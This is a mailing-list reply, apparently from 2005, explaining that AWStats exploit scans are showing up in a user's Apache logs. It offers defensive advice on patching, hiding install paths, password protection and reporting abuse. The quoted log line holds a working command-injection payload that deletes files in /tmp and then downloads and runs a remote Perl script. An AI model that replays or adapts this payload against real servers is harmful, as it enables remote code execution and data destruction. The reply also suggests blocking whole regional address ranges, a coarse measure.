Re: GET //awstats.pl? in apache logs

[FocusHacks <focushacks () gmail com>]

It's simply someone or some automated scanning script trying to
exploit the AWStats script on your server.  It could be a script
kiddie that's simply running the attack against a wide range of IP
Addresses including yours.  It might also be a worm of some sort
that's looking for a way to propogate itself.  Honestly, I wouldn't be
too concerned about this as long as you're certain that you're up to
date on patches and don't have too many extra things installed on your
web site.  It happens to all of us.

If you do have a lot of things installed on your site, such as
phpMyAdmin, phpNuke, Xoops, and the like, I usually recommend changing
the default path that they're installed in, which makes it more
difficult for automated scanning scripts and/or skript kiddies to
abuse, should an exploit ever be released for that software.

Also, if you can, put non-public WWW scripts and applications in a
directory with HTTP Authentication.  My webalizer and phpMyAdmin
directories are password protected, for instance.

If you continue to see attacks from the same (or similar) IP, then go
to this page and type in the IP Address(es) that the attacks are
coming from.  It will give you ownership and contact info for the
address.  This is usually the attacker's ISP.

http://ws.arin.net/whois

When contacting them (typically via abuse () their-domain-name com),
include as much detail as possible, including the log files attached
(only relavent log file portions) and the time zone that the log
file's date stamp is in.  This will often help them determine which of
their customers it is.

If the IP address seems to be from overseas, especially from Asia,
good luck getting any response or action.  I've found the best way to
solve that problem is to firewall off the subnet that the attacks came
from.  However, I have been known to simply firewall off an entire
class A (59.x.x.x and 61.x.x.x come to mind, both are allocated to
Asia Pacific NIC)

Forgive the horrid colors, but this is a good page with a lot of
well-known shady IP addresses and subnets:

http://www.unixhub.com/block.html

Cheers,
--Noah

On 10/21/05, Konstantine <listclient () gmail com> wrote:
> My apache logs show rows after rows of following, all from various IP
> addresses. This started a couple of days ago. I don't have awstats.
> Could somebody tell me what is that? Is there anything I should be
> doing? thanks.K.
> GET 
> //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
> HTTP/1.1


--
http://www.FocusHacks.com - The Ford Focus Modification Site!